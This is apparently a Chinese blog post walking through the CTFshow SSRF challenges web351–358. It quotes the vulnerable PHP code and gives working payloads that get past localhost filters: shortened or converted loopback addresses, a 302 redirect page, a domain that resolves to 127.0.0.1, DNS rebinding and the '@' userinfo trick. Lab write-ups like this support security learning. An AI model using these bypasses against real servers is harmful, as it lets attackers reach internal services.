CTFSHOW SSRF

最新推荐文章于 2022-05-14 10:04:06 发布
最新推荐文章于 2022-05-14 10:04:06 发布
阅读量232 收藏
点赞数
分类专栏: CTFSHOW 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CyhDl666/article/details/115324594
版权

文章目录

web351

  • payload:url=http://127.0.0.1/flag.php

web352

  • 源码
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
  • parse_url
$url = "http://www.electrictoolbox.com/php-extract-domain-from-full-url/";
$parts = parse_url($url);
# 输出结果
Array (
[scheme] => http
[host] => www.electrictoolbox.com
[path] => /php-extract-domain-from-full-url/
)
  • 过滤了localhost和127.0.0
  • 绕过方式
  1. 进制转化 可以转换为16进制
  2. 127.0.0.1可以缩写为127.1或者127.0.1

paylaod:url=http://127.1/flag.php

web353

  • 同上题目 过滤多了点
  • 可以用127.1或者进制转换

web354

<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
    die('hacker');
}
}
else{
    die('hacker');
}
  • 这道题一开是没想到怎么做
  • 后来想想前几天看佬在我面前解题用的方法

302跳转

  • 自己搭建一个网站,内容是一个跳转
<?php
header("Location:http://127.0.0.1/flag.php");
?>

然后payload就是自己网址下的这个页面

其他方法

  1. url=http://sudo.cc/flag.php 该域名绑定的就是127.0.0.1

web355

  • 限制了host长度小于等于5
  • 直接127.1绕过

web356

  • 限制host长度小于等于3
  • payload:http://0/flag.php

0.0.0.0,最特殊的一个ip地址,代表的是本机所有ip地址,不管你有多少个网口,多少个ip,如果监听本机的0.0.0.0上的端口,就等于监听机器上的所有ip端口。

web357

  • 源码
 <?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
    die('ip!');
}
echo file_get_contents($_POST['url']);
}
else{
    die('scheme');
}
?> scheme

1.gethostbyname():通过域名获取ip地址
2. filter_var(variable, filter, options)

  • variable:必需。规定要过滤的变量。
  • filter:可选。规定要使用的过滤器的 ID
  • options:可选。规定一个包含标志/选项的关联数组或者一个单一的标志/选项
    FILTER_VALIDATE_IP 过滤器把值作为 IP 进行验证。
  • 该题选择的过滤器:FILTER_VALIDATE_IP
    Name: “validate_ip”
    ID-number: 275
    可能的标志:
    FILTER_FLAG_IPV4 - 要求值是合法的 IPv4 IP(比如 255.255.255.255)
    FILTER_FLAG_IPV6 - 要求值是合法的 IPv6 IP(比如 2001:0db8:85a3:08d3:1319:8a2e:0370:7334)
    FILTER_FLAG_NO_PRIV_RANGE - 要求值是 RFC 指定的私域 IP (比如 192.168.0.1)
    FILTER_FLAG_NO_RES_RANGE - 要求值不在保留的 IP 范围内。该标志接受 IPV4 和 IPV6 值。
  • 这题可以用302跳转
<?php
header("Location:http://127.0.0.1/flag.php");
?>
  • 不能用自己的私域IP
  • 等等 去问问佬

DNS重绑定

  • 这道题还可以用这个方法DNS重绑定
  • 访问http://ceye.io/ 注册个账号
  • 在这里插入图片描述
  • 在这里插入图片描述
  • 修改为如下,Identifier中的内容为你的域名吧。
  • 然后payload:http://r.xxxxxx/flag.php
  • 多试几次就可以成功了。

web358

  • 源码
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
    echo file_get_contents($url);
}
  • 正则的要求是http://ctf.开头以show结尾
  • 有个好玩的东西 访问一下 www.baidu.com@4399.com 你会访问到4399
  • 这道题的payload:
  • url=http://ctf.@127.0.0.1/flag.php?show
海上清辉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfshow SSRF
qq_61768489的博客
03-21 2882
这位师傅讲的非常详细 web351 给了一段代码,不知道什么意思就去查看PHP cURL 函数 | 菜鸟教程 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url);//初始化 cURL 会话 curl_setopt($ch, CURLOPT_HEADER, 0);//启用时会将头文件的信息作为数据流输出。 curl_setopt($ch, CURLOPT_RET
[De1CTF 2019]SSRF Me
怪味巧克力的博客
07-14 189
0x01 题目给出了源码,我们看一下源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) s
[De1CTF 2019]SSRF Me(flask框架)
qq_44657899的博客
04-20 2622
题目首先提示了flag的位置,结合题目名字ssrf,可以得到一个大概的思路。 然后打开题目,直接给了源码: #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys im...
CTFshow web入门 SSRF
Lum1n0us's Blog
07-17 493
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 第一题,啥也没
CTFshow——SSRF
lee_maple的博客
04-23 3674
CTFshow——SSRF Web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result
SSRF利用总结
04-24
SSRF漏洞利用总结,类似SQL注入小计的形式,总结地比较完整。
WebLogic SSRF 及漏洞修复
11-25
### WebLogic SSRF 及其漏洞修复方法 #### 一、背景介绍 WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。...
SSRF bible. Cheatsheet
08-06
标题 "SSRF bible. Cheatsheet" 和描述 "SSRF bible. Cheatsheet SSRF attack and sockets presentation." 显示了文档的主题为服务器端请求伪造(SSRF)攻击和相关技术的介绍与实践。SSRF是一种网络攻击技术,攻击者...
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
最新发布
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
第一节 SSRF原理介绍-01
09-15
SSRF漏洞原理介绍 SSRF(Server-Side Request Forgery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。客户端服务端内网资源一般情况下,SSRF的目标就是与外部隔离的内网资源。 SSRF漏洞定义: ...
ctfshow—SSRF详解
cosmoslin的博客
09-24 1310
web 351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 前置 c
php反序列化之字符逃逸
qq_53856457的博客
05-14 1685
php反序列化之字符逃逸法 1.按我的理解,反序列化的过程就是碰到;}与最前面的{配对后,便停止反序列化。如下序列化: <?php class Test { public $a = "aa"; public $b = "bbb"; public $c = "cccc"; } $qwe = new Test(); echo serialize($qwe); 输出序列化结果为:O:4:“Test”:3:{s:1:“a”;s:2:“aa”;s:1:“b”;s:3:“bbb”;s:1:“c”;
BUU CTF web(四)
0xdawn的博客
05-11 5320
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
一次失败的CTF尝试记录(SSRF利用)
痴人说梦梦中人
10-13 1012
访问url,获取index.php代码如下: <?php if(!(isset($_POST['url']))){ show_source(__FILE__); } // include_once "ping.php"; if (isset($_POST['url'])) { $link = $_POST['url']; if(check($link)){ $curlobj = curl_init(); curl_setopt($curlobj
De1CTF—SSRF Me
迷风小白
08-31 6528
SSRF Me hint:flag is in ./flag.txt 拿到题目打开即是源码 右击查看源码发现是flask写的代码,有一个Task类和三个路由 接下来分析一下三个路由 #generate Sign For Action Scan. @app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): para...
CTFSHOW SSRF篇
羽的博客
01-05 4430
了前八道题,因为题目上的比较匆忙,提前做下就当测试题目了。 web351 存在一个flag.php页面,访问会返回不是本地用户的消息,那肯定是要让我们以本地用户去访问127.0.0.1/flag.php payload:url=http://127.0.0.1/flag.php web352 过滤了localhost和127.0.0。还是有很多方法的,比如127.0.1 、127.1、 127。0.0.1 或者转成16进制 2进制 转进制的地址https://tool.520101.com/wangluo/
buuctf [第二章 web进阶]SSRF Training
qq_52671379的博客
04-20 1978
buuctf [第二章 web进阶]SSRF Training
FireShell CTF 2019小记
郁离歌丶的博客
03-20 1004
FireShell CTF 2019小记 8说了,国际赛的难度大家都晓得滴。看题 Python Learning Environment 沙盒逃逸orz,最近喜欢玩的一个东东。 在前端的python.js里面可以看到一些waf源码。不过还没有我自己fuzz来的快,毕竟前端也不是很熟,源码又太多。 fuzz结果:不能用数字,不能用[],还有一堆常见的关键词需要绕过。以及内置函数只剩下exec和pri...
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
ctfshow ssrf
08-16
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种安全漏洞,通过利用服务器端请求功能,攻击者可以发送来自目标服务器的请求。在CTF比赛中,SSRF通常用于获取敏感信息或攻击内部系统。 在引用中提到了一系列与SSRF相关的内容,包括web351、web352、parse_url以及更改IP地址的写法等。些内容可能是指在CTF比赛中的具体题目或技术细节。 引用提到了SSRF的原理,即通过在URL中加入特殊字符来绕过解析过程,******<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [ctfshow-web入门 ssrf篇](https://blog.csdn.net/weixin_45696568/article/details/114434596)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [ctfshow--ssrf](https://blog.csdn.net/ing_end/article/details/124369282)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值